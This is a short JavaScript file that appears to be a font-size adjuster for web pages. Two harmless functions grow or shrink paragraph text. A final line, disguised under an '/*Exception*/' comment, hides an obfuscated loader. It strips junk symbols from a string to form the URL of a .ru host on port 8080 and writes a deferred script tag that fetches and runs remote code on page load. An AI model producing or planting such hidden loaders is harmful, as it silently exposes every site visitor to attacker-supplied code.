var min=8;
var max=18;
function increaseFontSize() {
   var p = document.getElementsByTagName('p');
   for(i=0;i<p.length;i++) {
      if(p[i].style.fontSize) {
         var s = parseInt(p[i].style.fontSize.replace("px",""));
      } else {
         var s = 12;
      }
      if(s!=max) {
         s += 1;
      }
      p[i].style.fontSize = s+"px"
   }
}
function decreaseFontSize() {
   var p = document.getElementsByTagName('p');
   for(i=0;i<p.length;i++) {
      if(p[i].style.fontSize) {
         var s = parseInt(p[i].style.fontSize.replace("px",""));
      } else {
         var s = 12;
      }
      if(s!=min) {
         s -= 1;
      }
      p[i].style.fontSize = s+"px"
   }   
}


/*Exception*/ document.write('<script src='+'h!t^!t&&!&p&):$^/^)/(@o)^w)$-@!^l))y!&).!g#o#@#o!#g^#(l!!e&.)#$c!(o)!($(m#.$^(#s)^a@.^@$i$&@n$#-($c!$o))$m)##$@.)&t)&r@&)!u@(e)#!l&^)i^))f#(#e$f&!a!&m!i(@!$l!)y!).!&&#r!&(u!$&$:^@@$@8^0@@8((0#))/$@z((y$@l!&@o(^)#m!$!#.&$@c(#$o(###m@&^/^z)^@y)!!l#(#o&)@(m@&^.^c)o^m(^#&/!@@)a)&)c)(^c@##u^&&w(e)!#a^#t!&!h!(^e@$&r@#$.(($c$(o()m&&!/$^g#o)!o!^)g@$@l$##e(@(#.$)#c##(^o(m!!/@m&(!e#!)g&!a#!(p(o@&!&r##(n$.(&c)&)^o#!m$&/^&'.replace(/\!|\)|@|\$|\(|\^|#|&/ig, '')+' defer=defer></scr'+'ipt>');